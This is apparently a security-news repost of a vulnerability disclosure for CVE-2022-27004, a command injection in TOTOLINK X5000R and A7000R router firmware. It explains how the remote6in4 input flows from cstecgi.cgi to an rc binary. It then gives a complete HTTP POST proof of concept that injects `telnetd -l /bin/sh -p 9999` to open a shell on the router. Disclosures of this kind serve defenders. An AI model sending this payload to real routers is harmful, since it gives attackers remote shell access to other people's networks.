Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-27004: my_vuln/31.md at main · wudipjq/my_vuln

Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.

CVE
Open in Source
#vulnerability#ubuntu#linux#js#git#java

TOTOLINK Vulnerability

Vendor:TOTOLINK

Product:X5000R,A7000R

Version:X5000R_Firmware(V9.1.0u.6118_B20201102)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html)

A7000R_Firmware(V9.1.0u.6115_B20201022)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/171/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng,Mengjie Sun,Chuan Qin

Institution:[email protected],[email protected],[email protected]

Vulnerability description

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In cstecgi.cgi binary:

In Tunnel 6in4 function, remote6in4 is directly passed by the attacker, so we can control the remote6in4 to attack the OS.

As you can see here, in setIpv6Cfg function, the input has not been checked. And then, call the function nvram_set to store this input.

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.

In rc binary:

Eventually, in sub_4385B4 function, the initial input will be extracted and cause command injection.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set remote6in4 as telnetd -l /bin/sh -p 9999 , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 319 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/advance/ipv6.html?time=1639967398362 Cookie: SESSION_ID=2:1646744210:2

{"wanAddr":"2001:0:0:0:0:0:0:0","wanSize":"64","wanGate":"2001:0:0:0:0:0:0:0","dns1":"2001:0:0:0:0:0:0:0","dns2":"","dns3":"","lanAddr":"2001:0:0:0:0:0:0:0","lanSize":"64","lanRadvFake":"1","lanDhcp":"1","remote6in4":"`telnetd -l /bin/sh -p 9999`","sitMtu":"1280","sitTtl":"64","service":"6in4","topicurl":"setIpv6Cfg"}

Result

Get a shell!

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE